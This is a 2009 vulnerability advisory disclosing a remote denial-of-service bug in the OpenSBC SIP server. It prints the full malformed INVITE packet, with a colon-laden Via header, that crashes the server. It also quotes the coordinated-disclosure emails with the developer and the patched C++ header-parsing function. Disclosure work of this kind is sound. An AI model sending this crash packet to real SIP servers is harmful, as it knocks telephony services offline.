OpenSBC (INVITE of Death)

The IMS Security Team

OpenSBC (INVITE of Death)

Advisory Draft Date: 2nd Feburary, 2009.
Release Date: 16th Feburary, 2009.

Affected Application	OpenSBC Server
Severity	High
Status	Disclosed
Reported To	Joegen Baclor (CTO Solegy Systems)
Author	M. Zubair Rafique and Dr. Muddassar Farooq

Background

OpenSBC is an ongoing attempt to create an open-source Session Border Controller that is fully compliant with the mandates of RFC 3261. OpenSBC can be used as a SIP router, media anchor for farend NAT traversal, SIP egress and ingress trunking among others. More information about the server can be found at http://opensipstack.org/

Overview

The INVITE of Death vulnerability in OpenSBC server allows the attacker to crash the server causing remote Denial of Service (DOS). The problem specifically exists in OpenSBC version 1.1.5-25 in the handling of “Via” field caused from maliciously crafted SIP packet.

Proof of Concept

The proof of concept code can be downloaded from here: OpenSBC.pl.
The malicious Packet on which the server crash is shown below:INVITE sip:bob@open-ims.test SIP/2.0
Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000
From: 0 ;tag=0
To: Receiver 
Call-ID: 0@localhost.localdomain
CSeq: 1 INVITE
Contact: 0 
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 131
v=0
o=0 0 0 IN IP4 localhost.localdomain
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

Work Around

The OpenSBC devolpment team has been reported about the vulnerability. Below is the E-mail exchange content between our research team and the CTO of Solegey Systems:

From: This sender is DomainKeys verified "Joegen Baclor" <joegen.baclor@gmail.com> To: m_zubair_rafique@yahoo.com, zubair.rafique@nexginrc.org, "Ali Akbar" <ali.akbar@nexginrc.org> The current version in CVS for OpenSBC is 1.1.5-82 and 1.1.13-17 for OpenSIPStack. The fix is really very simple. I just made sure that leading colons in the header name and trailing colons in the header values are stripped when parsing MIME. Attached is the function call. ---- void ParserTools::SliceMIME( const OString & mime, OString & name, OString & value ) { if( mime.IsEmpty() ) return; PINDEX colon = mime.Find( ": " ); if( colon != P_MAX_INDEX ) { name = mime.Left( colon ); value = mime.Mid( colon + 2 ); }else { colon = mime.Find( ":" ); if( colon != P_MAX_INDEX ) { name = mime.Left( colon ); if( ParserTools::IsKnownHeader( name ) ) value = mime.Mid( colon + 1 ); else { name = ""; value = mime; } }else { value = mime; } } if( !value.IsEmpty() ) { /// strip leading colons from value int leadingColons = 0; for( int i = 0; i < value.GetLength(); i++ ) { if( value[i] == ':' ) leadingColons++; else break; } if( leadingColons > 0 ) value = value.Mid( leadingColons ); } if( !name.IsEmpty() ) { ///strip trailing colons from name int trailingColons = 0; for( int i = name.GetLength() - 1; i >= 0 ; i-- ) { if( name[i] == ':' ) trailingColons++; else break; } if( trailingColons > 0 ) name = name.Left( name.GetSize() - trailingColons - 1 ); } } From: zubair rafique Sent: Friday, February 13, 2009 6:30 PM To: zubair.rafique@nexginrc.org ; Ali Akbar ; Joegen Baclor Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure Dear Jogen, We are grateful of having your feed back on the issue. As we are team of research engineers working on SIP servers (IMS Security) we believe that your coordination in this regard will be helpful for our research. Kindly provide me the release version number of OpenSBC in which the issue has been fixed. I will appreciate it if you could provide us the technical inside of the bug. This will help us in the disclosure of vulnerability and its remedy done by your team. Thank you for coordinating with us. Zubair Rafique --- On Fri, 2/13/09, Joegen Baclor <joegen.baclor@gmail.com> wrote: From: Joegen Baclor <joegen.baclor@gmail.com> Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure To: zubair.rafique@nexginrc.org, "Ali Akbar" <ali.akbar@nexginrc.org> Date: Friday, February 13, 2009, 12:00 PM Hi the issue is now fixed in OpenSBC CVS. Anything, you need me to provide aside from patching our software? -------------------------------------------------- From: <zubair.rafique@nexginrc.org> Sent: Friday, February 13, 2009 3:51 AM To: "Ali Akbar" <ali.akbar@nexginrc.org> Cc: "Joegen Baclor" <joegen.baclor@gmail.com> Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure > Dear Jogen, > > As my colleague Ali Akbar has sent you the mail regarding vulnerability in OpenSBC. This email is reminder, in order to ensure coordination from your side regarding the issue. > > Regards > > Zubair Rafique > > Quoting Ali Akbar <ali.akbar@nexginrc.org>: > >> Dear Joegen, >> >> I am attaching the vulnerability advisory (VA-nexGINRC-2009-01) and Proof of >> Concept (Poc) script with this email. The advisory and PoC are confidential, >> and have not been disclosed to anyone outside the project team. This >> material should enable you to reproduce the server crash scenario on your >> testbed. >> >> We hope to include the description of the vulnerability as an example of SIP >> servers' vulnerability to parsing attacks. The deadline of paper submission >> is 16 Feb 2009. We hope that you get back to us with feedback regarding the >> issue. >> >> Please feel free to contact us regarding any query. >> >> Regards, >> M. Ali Akbar >> >> On Tue, Jan 27, 2009 at 7:37 AM, Joegen Baclor <joegen.baclor@gmail.com>wrote: >> >>> Hi Ali, >>> >>> My name is Joegen Baclor and I am the developer of OpenSBC. You can >>> correspond with me regarding the vulnerability using the e-mail address. >>> >>> Joegen >>> >>> -------------------------------------------------- >>> From: <ali.akbar@nexginrc.org> >>> Sent: Monday, January 26, 2009 4:27 PM >>> To: <joegen@opensipstack.org>; <rdiola@solegy.com> >>> Subject: Urgent: OpenSBC information request for vulnerability disclosure >>> >>> Dear All, >>>> >>>> We are currently working on security assessment of different publicly >>>> availbale SIP servers. OpenSBC is included in the list of selected SIP >>>> servers/proxies. During one of our experiments, we found that OpenSBC >>>> server is vulnerable to a remote DoS exploit. We are eager to share >>>> more information about the exploit with the developer of OpenSBC. We >>>> are also willing to provide assisstance in creation and testing of the >>>> patch. >>>> >>>> We need the contact email address of the developer or the concerned >>>> person. Your help in this regard is highly appreciated. >>>> >>>> >>>> About Me: >>>> I am a research engineer at Next Generation Intelligent Networks >>>> Research Center (nexGIN RC). We are currently working on a research >>>> project that deals with the security of IP Multimedia Subsystem (IMS). >>>> You can find more information about our project at our website >>>> http://www.nexginrc.org/ >>>> >>>> Regards, >>>> Ali >>>> >>>> >>>> >>> >>> >>> >>>> No virus found in this incoming message. >>>> Checked by AVG - http://www.avg.com >>>> Version: 8.0.176 / Virus Database: 270.10.13/1915 - Release Date: >>>> 1/25/2009 6:13 PM >>>> >>>> >> > >

Credits

The vulnerability was discovered by Zubair Rafique and Sohail Aziz from the IMS security research project team.

Contact

M. Zubair Rafique                       M. Ali Akbar
Zubair.rafique@nexginrc.org       ali.akbar@nexginrc.org
+92-346-5356929                     +92-321-2936105

Disclaimer

The contents of this advisory are copyright (c) 2009 nexGIN RC , and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 

LINK: http://ims-bisf.nexginrc.org/OpenSBC-vul.html